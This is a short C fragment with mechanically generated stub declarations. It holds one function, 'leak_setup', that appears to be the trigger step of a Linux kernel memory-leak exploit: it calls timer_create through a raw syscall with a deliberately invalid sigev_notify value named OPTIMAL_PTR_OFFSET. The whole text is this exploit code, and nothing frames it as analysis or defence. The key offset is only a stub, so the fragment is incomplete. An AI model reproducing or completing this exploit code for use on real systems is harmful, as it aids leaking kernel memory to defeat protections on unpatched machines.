
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_3__ TYPE_1__ ;


typedef int timer_t ;
typedef int se ;
struct TYPE_3__ {int sigev_notify; int sigev_signo; } ;
typedef TYPE_1__ k_sigevent_t ;


 int CLOCK_REALTIME ;
 int EXIT_FAILURE ;
 int OPTIMAL_PTR_OFFSET ;
 int SIGRTMIN ;
 int SYS_timer_create ;
 int exit (int ) ;
 int memset (TYPE_1__*,int ,int) ;
 int perror (char*) ;
 int syscall (int ,int ,void*,int *) ;

__attribute__((used)) static void leak_setup() {
 k_sigevent_t se;
 memset(&se, 0, sizeof(se));
 se.sigev_signo = SIGRTMIN;
 se.sigev_notify = OPTIMAL_PTR_OFFSET;
 timer_t timerid = 0;

 int rv = syscall(SYS_timer_create, CLOCK_REALTIME,
    (void *)&se, &timerid);
 if (rv != 0) {
  perror("[-] timer_create()");
  exit(EXIT_FAILURE);
 }
}
